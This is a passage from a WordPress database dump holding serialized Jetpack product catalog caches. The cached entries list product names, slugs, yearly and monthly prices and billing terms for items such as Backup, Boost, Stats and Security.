Anti-Spam\";s:12:\"product_slug\";s:28:\"a4a_jetpack_anti_spam_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_anti_spam_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$59.40\";s:21:\"combined_cost_display\";s:6:\"$59.40\";s:4:\"cost\";d:59.39999999999999857891452847979962825775146484375;s:18:\"cost_smallest_unit\";i:5940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$4.95\";}s:29:\"a4a_jetpack_anti_spam_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3323;s:12:\"product_name\";s:17:\"Jetpack Anti-Spam\";s:12:\"product_slug\";s:29:\"a4a_jetpack_anti_spam_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_anti_spam_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$4.95\";s:21:\"combined_cost_display\";s:5:\"$4.95\";s:4:\"cost\";d:4.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:28:\"a4a_jetpack_backup_t1_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3324;s:12:\"product_name\";s:21:\"Jetpack Backup (10GB)\";s:12:\"product_slug\";s:28:\"a4a_jetpack_backup_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_backup_t1_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$59.40\";s:21:\"combined_cost_display\";s:6:\"$59.40\";s:4:\"cost\";d:59.39999999999999857891452847979962825775146484375;s:18:\"cost_smallest_unit\";i:5940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$4.95\";}s:29:\"a4a_jetpack_backup_t1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3325;s:12:\"product_name\";s:21:\"Jetpack Backup (10GB)\";s:12:\"product_slug\";s:29:\"a4a_jetpack_backup_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_backup_t1_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$4.95\";s:21:\"combined_cost_display\";s:5:\"$4.95\";s:4:\"cost\";d:4.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:28:\"a4a_jetpack_backup_t2_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3326;s:12:\"product_name\";s:20:\"Jetpack Backup (1TB)\";s:12:\"product_slug\";s:28:\"a4a_jetpack_backup_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_backup_t2_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$143.40\";s:21:\"combined_cost_display\";s:7:\"$143.40\";s:4:\"cost\";d:143.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:14340;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$11.95\";}s:29:\"a4a_jetpack_backup_t2_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3327;s:12:\"product_name\";s:20:\"Jetpack Backup (1TB)\";s:12:\"product_slug\";s:29:\"a4a_jetpack_backup_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_backup_t2_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:29:\"a4a_jetpack_videopress_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3328;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:29:\"a4a_jetpack_videopress_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:29:\"a4a_jetpack_videopress_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$59.40\";s:21:\"combined_cost_display\";s:6:\"$59.40\";s:4:\"cost\";d:59.39999999999999857891452847979962825775146484375;s:18:\"cost_smallest_unit\";i:5940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$4.95\";}s:30:\"a4a_jetpack_videopress_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3329;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:30:\"a4a_jetpack_videopress_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:29:\"a4a_jetpack_videopress_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$4.95\";s:21:\"combined_cost_display\";s:5:\"$4.95\";s:4:\"cost\";d:4.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"a4a_jetpack_stats_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3330;s:12:\"product_name\";s:13:\"Jetpack Stats\";s:12:\"product_slug\";s:24:\"a4a_jetpack_stats_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:24:\"a4a_jetpack_stats_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$100.00\";s:21:\"combined_cost_display\";s:4:\"$100\";s:4:\"cost\";i:100;s:18:\"cost_smallest_unit\";i:10000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$8.33\";}s:25:\"a4a_jetpack_stats_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3331;s:12:\"product_name\";s:13:\"Jetpack Stats\";s:12:\"product_slug\";s:25:\"a4a_jetpack_stats_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:24:\"a4a_jetpack_stats_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$8.33\";s:21:\"combined_cost_display\";s:5:\"$8.33\";s:4:\"cost\";d:8.3300000000000000710542735760100185871124267578125;s:18:\"cost_smallest_unit\";i:833;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"a4a_jetpack_monitor_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3332;s:12:\"product_name\";s:15:\"Jetpack Monitor\";s:12:\"product_slug\";s:26:\"a4a_jetpack_monitor_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:26:\"a4a_jetpack_monitor_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.64\";s:21:\"combined_cost_display\";s:6:\"$14.64\";s:4:\"cost\";d:14.6400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:1464;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$1.22\";}s:27:\"a4a_jetpack_monitor_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3333;s:12:\"product_name\";s:15:\"Jetpack Monitor\";s:12:\"product_slug\";s:27:\"a4a_jetpack_monitor_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:26:\"a4a_jetpack_monitor_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$1.00\";s:21:\"combined_cost_display\";s:2:\"$1\";s:4:\"cost\";i:1;s:18:\"cost_smallest_unit\";i:100;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"a4a_jetpack_boost_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3334;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:24:\"a4a_jetpack_boost_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:24:\"a4a_jetpack_boost_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:25:\"a4a_jetpack_boost_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3335;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:25:\"a4a_jetpack_boost_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:24:\"a4a_jetpack_boost_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:21:\"a4a_jetpack_ai_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3336;s:12:\"product_name\";s:10:\"Jetpack AI\";s:12:\"product_slug\";s:21:\"a4a_jetpack_ai_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"a4a_jetpack_ai_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$59.40\";s:21:\"combined_cost_display\";s:6:\"$59.40\";s:4:\"cost\";d:59.39999999999999857891452847979962825775146484375;s:18:\"cost_smallest_unit\";i:5940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$4.95\";}s:22:\"a4a_jetpack_ai_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3337;s:12:\"product_name\";s:10:\"Jetpack AI\";s:12:\"product_slug\";s:22:\"a4a_jetpack_ai_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"a4a_jetpack_ai_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$8.33\";s:21:\"combined_cost_display\";s:5:\"$8.33\";s:4:\"cost\";d:8.3300000000000000710542735760100185871124267578125;s:18:\"cost_smallest_unit\";i:833;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:28:\"a4a_jetpack_social_v1_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3338;s:12:\"product_name\";s:14:\"Jetpack Social\";s:12:\"product_slug\";s:28:\"a4a_jetpack_social_v1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_social_v1_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$59.40\";s:21:\"combined_cost_display\";s:6:\"$59.40\";s:4:\"cost\";d:59.39999999999999857891452847979962825775146484375;s:18:\"cost_smallest_unit\";i:5940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$4.95\";}s:29:\"a4a_jetpack_social_v1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3339;s:12:\"product_name\";s:14:\"Jetpack Social\";s:12:\"product_slug\";s:29:\"a4a_jetpack_social_v1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_social_v1_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$4.95\";s:21:\"combined_cost_display\";s:5:\"$4.95\";s:4:\"cost\";d:4.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"a4a_jetpack_creator_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3340;s:12:\"product_name\";s:15:\"Jetpack Creator\";s:12:\"product_slug\";s:26:\"a4a_jetpack_creator_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:26:\"a4a_jetpack_creator_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:27:\"a4a_jetpack_creator_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3341;s:12:\"product_name\";s:15:\"Jetpack Creator\";s:12:\"product_slug\";s:27:\"a4a_jetpack_creator_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:26:\"a4a_jetpack_creator_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}}'),(854,42,'my-jetpack-cache-date','1679570598'),(855,42,'my-jetpack-cache','O:8:\"stdClass\":51:{s:15:\"jetpack_premium\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2000;s:12:\"product_name\";s:15:\"Jetpack Premium\";s:12:\"product_slug\";s:15:\"jetpack_premium\";s:11:\"description\";s:53:\"Daily Backups, Automated Restores and Spam Protection\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-premium\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$99.00\";s:21:\"combined_cost_display\";s:6:\"$99.00\";s:4:\"cost\";i:99;s:18:\"cost_smallest_unit\";i:9900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:16:\"jetpack_business\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2001;s:12:\"product_name\";s:20:\"Jetpack Professional\";s:12:\"product_slug\";s:16:\"jetpack_business\";s:11:\"description\";s:68:\"Daily Backups, Security Scanning, Spam Protection, Polls and Surveys\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-business\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$299.00\";s:21:\"combined_cost_display\";s:7:\"$299.00\";s:4:\"cost\";i:299;s:18:\"cost_smallest_unit\";i:29900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:12:\"jetpack_free\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2002;s:12:\"product_name\";s:12:\"Jetpack Free\";s:12:\"product_slug\";s:12:\"jetpack_free\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-free\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:5:\"$0.00\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_premium_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2003;s:12:\"product_name\";s:15:\"Jetpack Premium\";s:12:\"product_slug\";s:23:\"jetpack_premium_monthly\";s:11:\"description\";s:49:\"Daily Backups, Security Scanning, Spam Protection\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-premium\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.00\";s:21:\"combined_cost_display\";s:5:\"$9.00\";s:4:\"cost\";i:9;s:18:\"cost_smallest_unit\";i:900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_business_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2004;s:12:\"product_name\";s:20:\"Jetpack Professional\";s:12:\"product_slug\";s:24:\"jetpack_business_monthly\";s:11:\"description\";s:67:\"Daily Backups, Malware Scanning, Threat Resolution, Spam Protection\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-business\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.00\";s:21:\"combined_cost_display\";s:6:\"$29.00\";s:4:\"cost\";i:29;s:18:\"cost_smallest_unit\";i:2900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:16:\"jetpack_personal\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2005;s:12:\"product_name\";s:16:\"Jetpack Personal\";s:12:\"product_slug\";s:16:\"jetpack_personal\";s:11:\"description\";s:83:\"Daily backups, Spam protection, plus all the features you already love from Jetpack\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-personal\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$39.00\";s:21:\"combined_cost_display\";s:6:\"$39.00\";s:4:\"cost\";i:39;s:18:\"cost_smallest_unit\";i:3900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_personal_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2006;s:12:\"product_name\";s:16:\"Jetpack Personal\";s:12:\"product_slug\";s:24:\"jetpack_personal_monthly\";s:11:\"description\";s:67:\"Daily Backups, Malware Scanning, Threat Resolution, Spam Protection\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-personal\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$3.50\";s:21:\"combined_cost_display\";s:5:\"$3.50\";s:4:\"cost\";d:3.5;s:18:\"cost_smallest_unit\";i:350;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_security_daily\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2010;s:12:\"product_name\";s:22:\"Jetpack Security Daily\";s:12:\"product_slug\";s:22:\"jetpack_security_daily\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:22:\"jetpack-security-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$299.00\";s:21:\"combined_cost_display\";s:7:\"$299.00\";s:4:\"cost\";i:299;s:18:\"cost_smallest_unit\";i:29900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:149;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:30:\"jetpack_security_daily_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2011;s:12:\"product_name\";s:22:\"Jetpack Security Daily\";s:12:\"product_slug\";s:30:\"jetpack_security_daily_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:22:\"jetpack-security-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$24.95\";s:21:\"combined_cost_display\";s:6:\"$24.95\";s:4:\"cost\";d:24.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"jetpack_security_realtime\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2012;s:12:\"product_name\";s:26:\"Jetpack Security Real-time\";s:12:\"product_slug\";s:25:\"jetpack_security_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack-security-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$839.00\";s:21:\"combined_cost_display\";s:7:\"$839.00\";s:4:\"cost\";i:839;s:18:\"cost_smallest_unit\";i:83900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:419;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:33:\"jetpack_security_realtime_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2013;s:12:\"product_name\";s:26:\"Jetpack Security 